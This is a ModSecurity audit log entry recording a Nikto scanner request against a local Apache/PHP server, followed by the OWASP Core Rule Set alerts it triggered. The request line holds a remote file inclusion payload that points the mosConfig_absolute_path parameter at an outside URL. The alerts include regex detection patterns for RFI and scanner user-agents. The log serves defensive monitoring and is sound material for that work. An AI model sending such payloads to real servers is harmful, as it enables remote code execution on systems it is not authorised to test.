Created January 27, 2016 12:59
--89a3fd2c-A--
[13/Jan/2016:08:04:36 --0300] VpYvRH8AAQEAAF-yfRIAAAAA 127.0.0.1 34506 127.0.0.1 80
--89a3fd2c-B--
GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://cirt.net/rfiinc.txt? HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:005057)
Host: localhost
--89a3fd2c-F--
HTTP/1.1 200 OK
Vary: Cookie
Set-Cookie: testcookie
Access-Control-Allow-Origin: *
Keep-Alive: timeout=5, max=48
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
--89a3fd2c-E--
--89a3fd2c-H--
Message: Warning. Match of "within %{tx.allowed_methods}" against "REQUEST_METHOD" required. [file "/etc/modsecurity/owasp-v2/base_rules/modsecurity_crs_30_http_policy.conf"] [line "31"] [id "960032"] [rev "2"] [msg "Method is not allowed by policy"] [data "GET"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/METHOD_NOT_ALLOWED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "OWASP_AppSensor/RE1"] [tag "PCI/12.1"]
Message: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/etc/modsecurity/owasp-v2/base_rules/modsecurity_crs_21_protocol_anomalies.conf"] [line "47"] [id "960015"] [rev "1"] [msg "Request Missing an Accept Header"] [severity "NOTICE"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/MISSING_HEADER_ACCEPT"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"]
Message: Warning. Match of "within %{tx.allowed_http_versions}" against "REQUEST_PROTOCOL" required. [file "/etc/modsecurity/owasp-v2/base_rules/modsecurity_crs_30_http_policy.conf"] [line "78"] [id "960034"] [rev "2"] [msg "HTTP protocol version is not allowed by policy"] [data "HTTP/1.1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/PROTOCOL_NOT_ALLOWED"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.10"]
Message: Warning. Matched phrase "nikto" at REQUEST_HEADERS:User-Agent. [file "/etc/modsecurity/owasp-v2/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "20"] [id "990002"] [rev "2"] [msg "Request Indicates a Security Scanner Scanned the Site"] [data "mozilla/5.00 (nikto/2.1.5) (evasions:none) (test:005057)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/SECURITY_SCANNER"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"]
Message: Warning. Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/etc/modsecurity/owasp-v2/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "Nikto"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"]
Message: Warning. Pattern match "(?i:(\\binclude\\s*\\([^)]*|mosConfig_absolute_path|_CONF\\[path\\]|_SERVER\\[DOCUMENT_ROOT\\]|GALLERY_BASEDIR|path\\[docroot\\]|appserv_root|config\\[root_dir\\])=(ht|f)tps?:\\/\\/)" at QUERY_STRING. [file "/etc/modsecurity/owasp-v2/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "157"] [id "950118"] [rev "3"] [msg "Remote File Inclusion Attack"] [data "Matched Data: mosConfig_absolute_path=http:// found within QUERY_STRING: _REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://cirt.net/rfiinc.txt?"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"]
Message: Warning. Pattern match "^(?i)(?:ft|htt)ps?(.*?)\\?+$" at ARGS:mosConfig_absolute_path. [file "/etc/modsecurity/owasp-v2/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "160"] [id "950119"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://cirt.net/rfiinc.txt? found within ARGS:mosConfig_absolute_path: http://cirt.net/rfiinc.txt?"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"]
Message: Warning. Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/etc/modsecurity/owasp-v2/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cirt.net/rfiinc.txt? found within TX:1: cirt.net/rfiinc.txt?"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"]
Message: Warning. Operator GT matched 0 at TX. [file "/etc/modsecurity/owasp-v2/slr_rules/modsecurity_crs_46_slr_et_rfi_attacks.conf"] [line "1820"] [id "2008923"] [rev "3"] [msg "SLR: ET WEB_SPECIFIC_APPS TxtBlog index.php m Parameter Local File Inclusion"] [data "http://cirt.net/rfiinc.txt?"] [severity "CRITICAL"] [tag "web-application-attack"] [tag "bugtraq,32498"]
Apache-Error: [file "apache2_util.c"] [line 273] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Apache-Error: [file "apache2_util.c"] [line 273] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Apache-Error: [file "apache2_util.c"] [line 273] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Apache-Error: [file "apache2_util.c"] [line 273] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Apache-Error: [file "apache2_util.c"] [line 273] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Apache-Error: [file "apache2_util.c"] [line 273] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Apache-Error: [file "apache2_util.c"] [line 273] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Apache-Error: [file "apache2_util.c"] [line 273] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Apache-Error: [file "apache2_util.c"] [line 273] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Apache-Handler: application/x-httpd-php
Stopwatch: 1452683076134324 30129 (- - -)
Stopwatch2: 1452683076134324 30129; combined=27956, p1=23125, p2=4699, p3=8, p4=57, p5=66, sr=38, sw=1, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.0 (http://www.modsecurity.org/).
Server: Apache/2.4.12 (Ubuntu)
Engine-Mode: "ENABLED"
--89a3fd2c-Z--